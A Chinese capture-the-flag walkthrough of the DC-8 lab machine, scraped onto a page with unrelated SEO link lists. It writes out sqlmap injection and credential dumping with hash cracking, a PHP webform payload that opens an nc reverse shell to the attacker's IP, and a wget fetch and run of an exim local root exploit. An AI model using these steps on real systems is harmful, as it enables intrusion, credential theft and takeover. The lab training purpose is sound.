当前位置: 首页 > news >正文

小公司建设网站永久免费自助建站平台

小公司建设网站,永久免费自助建站平台,武汉比较好的网站推广公司,做旅行网站的意义期末倒计时一周,发完这篇就要好好复习期末了,【许愿】 1.信息查询 1.1.Ip arp-scan -l 192.168.220.138 1.2.扫描端口 nmap -T4 -A -p- 192.168.220.138 接下来直接访问当前的主机,发现地址栏中的 nid 会发生变化,猜测可…

期末倒计时一周,发完这篇就要好好复习期末了,【许愿】

1.信息查询

1.1.Ip

arp-scan  -l

192.168.220.138

1.2.扫描端口

nmap -T4  -A  -p-  192.168.220.138

接下来直接访问当前的主机,发现地址栏中的 nid 会发生变化,猜测可能会存在 sql 注入漏洞

验证一下 sql 注入是否真的存在,随机给一个不存在的值 x,观察是否会报 sql 的错误信息,如果报了,说明存在 sql 注入

接下来就可以直接使用 sqlmap 进行攻击

sqlmap  -u  "http://192.168.220.138/?nid=1"  --current-db

sqlmap  -u  "http://192.168.220.138/?nid=1"  -D 'd7db'  --tables

获取当前数据库中的所有表,我们想要查看用户的信息可以进行登录,需要使用 users 表

sqlmap  -u  "http://192.168.220.138/?nid=1"  -D 'd7db'  -T 'users' --columns

获取出当前 users 表的字段,接下来获取值

sqlmap  -u  "http://192.168.220.138/?nid=1"  -D 'd7db'  -T 'users' -C 'name,pass'  --dump

获取当前的密码,但是密码加密了,接下来需使用 john --show 查看解密

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

vim dc8.txt

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

写进去然后保存

爆破密码

john dc8.txt

爆破出来的密码: turtle

可以尝试远程连接,但是不好使

1.3.扫描目录

dirsearch -u 192.168.220.138 -e* -i 200

发现了有/user/login 这个页面,接下来就直接访问,使用上面账号进行登录,发现只有 john 能登录成功

接下来需要找突破口,在 webform 中有新的发现

2. shell 反弹

选择 form setting,然后写入 shell 反弹脚本

<h1>xxxx</h1><?phpsystem("nc -e /bin/bash 192.168.126.138 7777");?>

注意选php

点击保存

然后需要写一些信息来进行提交

反弹成功,并设置python交互

使用 python 命令行脚本

python -c 'import pty;pty.spawn("/bin/bash")'

    3.提权

    然后接下来要做两件事情

    1. 进入到 home 目录,发现无任何价值信息

    2.sudo -l进行提权,发现不好使,接下来使用 suid 方式进行提权

    find / -user root -perm -u=s 2>/dev/null

    发现 exim4 在使用时具有 root 权限

    exim 是一个邮件传输的代理,用于在电子邮件服务器之间进行邮件交换和路由。

    4.发现exim的提权方式

    查看 exim4 的版本

    exim4  --version

    可以搜索这个版本的漏洞

    searchsploit exim

    搜索 46996 这个文件

    searchsploit  -p    linux/local/46996.sh

    接下来复制一份到本地,然后传递到靶机上

    cp  /usr/share/exploitdb/exploits/linux/local/46996.sh   46996.sh

    搭建 python 的服务器,用户传递数据

    python3  -m  http.server 8888

    搭建 python 的服务器,用户传递数据

    python3  -m  http.server 8888

    在靶机中先切换到/tmp.然后在进行 sh 文件的下载

    查看一下自己虚拟机的ip

    192.168.220.146

    ​
    cd  /tmpwget http://192.168.220.146:8888/46996.sh​

    给当前脚本一个执行权限

    chmod  777  46996.sh

    查看这个脚本内容,发现有两种提权方式

    ./46996.sh -m  netcat

    最后

    cd  /rootlscat flag.txt

    http://www.zhongyajixie.com/news/35261.html

    相关文章:

  1. 和优网络做的网站感染病毒线下推广团队
  2. 企业侧备案系统办理网站交换友情链接吧
  3. 网站在只有域名了网站seo优化总结
  4. 做销售网站多少钱网络公司是做什么的
  5. 做自己的网站挣钱广告联盟接单平台
  6. 企业品牌推广公司哪家好广州网站快速优化排名
  7. 甘肃省人民政府官网优化大师官方下载
  8. 购物平台大全seo关键词布局
  9. 即墨哪里有做网站的seo 0xu
  10. 怎么用电脑做网站主机高清视频线转换线
  11. 深圳 经营性网站备案十大微商推广平台
  12. 影院网站建设主管湖南平台网站建设设计
  13. 做网站好还是做淘宝好餐饮店如何引流与推广
  14. 网站怎么做rss网站排行榜前十名
  15. 网站建设的主要技术指什么优化培训内容
  16. 做团购网站视频搜索引擎优化介绍
  17. 网站页面引导怎么做叶涛网站推广优化
  18. 个人如何做公益网站关键词一般是指什么
  19. 做调查的网站推荐深圳知名seo公司
  20. 云南手机网站制作网络舆情案例分析
  21. 小米的网站是哪个公司做的高端营销型网站制作
  22. 上海大众汽车网站哪家公司做的seo实战密码
  23. 有模块传奇网站怎么做百度企业认证怎么认证
  24. 竞价网站制作免费的h5制作网站
  25. 门户网站重要性留号码的广告网站不需要验证码
  26. 石景山广州网站建设百度seo优化怎么做
  27. 宁波seo建站价格国外网站seo
  28. wordpress 商品 插件有名的seo外包公司
  29. 网站开发与运营方向网站优化入门
  30. 263邮箱个人登录口西安seo王尘宇